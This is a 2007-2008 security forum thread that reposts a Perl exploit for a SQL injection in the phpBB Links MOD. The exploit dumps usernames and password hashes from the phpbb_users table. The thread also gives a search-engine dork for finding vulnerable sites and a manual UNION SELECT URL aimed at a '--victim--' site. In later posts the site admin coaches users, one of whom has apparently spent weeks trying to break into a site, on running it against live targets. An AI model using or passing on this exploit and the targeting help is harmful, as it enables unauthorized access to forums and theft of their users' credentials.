 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
phpBB Links MOD 1.2.2 Remote SQL Injection Exploit |
 |
 Posted: Mon Sep 03, 2007 8:44 am |
 |
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
 |
|
 |
|
This one comes from milw0rm:
http://www.milw0rm.com/exploits/4346
| Code: |
#!/usr/bin/perl
print q{
phpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit
Bug discovered by Don
Dork: allinurl:links.php?t=search
or: "Links MOD v1.2.2 by phpBB2.de"
SQL INJECTION: Exploit: links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/*
};
use IO::Socket;
print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /phpBB2/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=".$user."/*";
print "
Exploit in process...\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploit\r\n";
print "in process...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "Exploit finished!\r\n\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "MD5-Hash is: ".$1."\r\n";
}
exit();
}
}
# milw0rm.com [2007-08-31]
|
 |
|
|
|
|
|
|
|
|
| Posted: Tue Sep 04, 2007 12:13 am |
|
|
| diegocure15 |
| Active user |
 |
|
| Joined: Sep 22, 2004 |
| Posts: 27 |
|
|
|
|
|
|
|
i did used it but the hash never prints out....
am i doing something wrong?
it says type the url, i typed the url
type the directory, i typed the directory
then type the user id, i typed the user id "2"
the it says exploit working and the the exploit finished ok
and then md5 hash never prints out....   |
|
|
|
|
|
|
|
|
| Posted: Thu Sep 06, 2007 1:17 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
So i was having little bit fun and tried to use that exploit in real world - manually, without any scripts. And it worked!
Here is, what I can suggest:
| Code: |
http://www.--victim--.com/forum/links.php?t=search&search_keywords=asd&start=1,1+UNION+SELECT+1,username,user_password,4,5,6,7,8,9,10,11,12+FROM+phpbb_users/*
|
And as result you will get ALL of the usernames and password hashes from database 
Now, if it is not working, then you probably can see error message. Try to figure it out - maybe sql table prefix is not "phpbb_", but something else  |
|
|
|
|
| Posted: Fri Sep 07, 2007 5:32 pm |
|
|
| Dorsk |
| Regular user |
 |
|
| Joined: Aug 28, 2007 |
| Posts: 20 |
|
|
|
|
|
|
|
Works! nice script!
Thanks waraxe!
EDIT---> What about a PHPNUKE website using PHPBB forums?
Would we try looking under the "/modules/forums/" folder? Also depending on where their forums are located within PHPNUKE. |
|
|
|
|
| Posted: Fri Sep 07, 2007 7:38 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Dorsk wrote: | Works! nice script!
Thanks waraxe!
EDIT---> What about a PHPNUKE website using PHPBB forums?
Would we try looking under the "/modules/forums/" folder? Also depending on where their forums are located within PHPNUKE. |
Well, i'm not sure, that this MOD is working with phpnuke-integrated phpbb ... |
|
|
|
|
| Posted: Fri Sep 07, 2007 8:58 pm |
|
|
| Dorsk |
| Regular user |
|
|
| Joined: Aug 28, 2007 |
| Posts: 20 |
|
|
|
|
|
|
|
Thanks waraxe,
I have a few PHPNUKE testing sites up with different NUKE versions, with PHPBB. I will try on there and if I get something, I will be sure to post it! |
|
|
|
|
| Posted: Tue Sep 30, 2008 3:22 am |
|
|
| sanxi |
| Regular user |
|
|
| Joined: Sep 29, 2008 |
| Posts: 5 |
|
|
|
|
|
|
|
I know this thread is old (apologies if I'm not supposed to bump), but are people still using this?
I'm having the same problem as diegocure15, I get: Exploit working, Exploit finished, and then nothing.
should I try another method, or does that mean the target is vulnerable to this exploit, and I need to enter different information? if so, any suggestions on what I need to change?
not good enough at this to work it out on my own, I'm afraid! |
|
|
|
|
| Posted: Tue Sep 30, 2008 9:43 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Have you tried manual method?
| Code: |
http://www.--victim--.com/forum/links.php?t=search&search_keywords=asd&start=1,1+UNION+SELECT+1,username,user_password,4,5,6,7,8,9,10,11,12+FROM+phpbb_users/*
|
But i'm sure, that so old security hole is allready patched |
|
|
|
|
| Posted: Tue Sep 30, 2008 11:12 am |
|
|
| sanxi |
| Regular user |
|
|
| Joined: Sep 29, 2008 |
| Posts: 5 |
|
|
|
|
|
|
|
| waraxe wrote: | | Have you tried manual method? |
error page 
| waraxe wrote: | | But i'm sure, that so old security hole is allready patched |
yes, I thought so. I have been at this for weeks so I got a little too excited when I saw 'exploit working' and hoped I'd just made some silly mistake, and that I was nearly in.
back to the start again - thanks. |
|
|
|
|
| Posted: Tue Sep 30, 2008 11:18 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Error page? What kind of error? |
|
|
|
|
| Posted: Tue Sep 30, 2008 11:23 am |
|
|
| sanxi |
| Regular user |
|
|
| Joined: Sep 29, 2008 |
| Posts: 5 |
|
|
|
|
|
|
|
404 not found
(sorry, I should know to be more specific!) |
|
|
|
|
| Posted: Tue Sep 30, 2008 11:37 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| sanxi wrote: | 404 not found
(sorry, I should know to be more specific!) |
You have to find path to "links.php" first. Error 404 means that you have used wrong URL! |
|
|
|
|
| Posted: Tue Sep 30, 2008 11:50 am |
|
|
| sanxi |
| Regular user |
|
|
| Joined: Sep 29, 2008 |
| Posts: 5 |
|
|
|
|
|
|
|
ah, so it may still work?
I'll try to find the right path, cheers. |
|
|
|
|
| Posted: Tue Sep 30, 2008 11:55 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| This exploit is against "phpBB Links MOD", so how do you know, that specific phpbb installation is using that MOD? |
|
|
|
|
| Posted: Tue Sep 30, 2008 12:10 pm |
|
|
| sanxi |
| Regular user |
|
|
| Joined: Sep 29, 2008 |
| Posts: 5 |
|
|
|
|
|
|
|
I can see? we mean the mod that adds links to the index page don't we?
if we don't, then I'm guessing and hoping  so very noob at this. |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 207
Members: 0
Total: 207
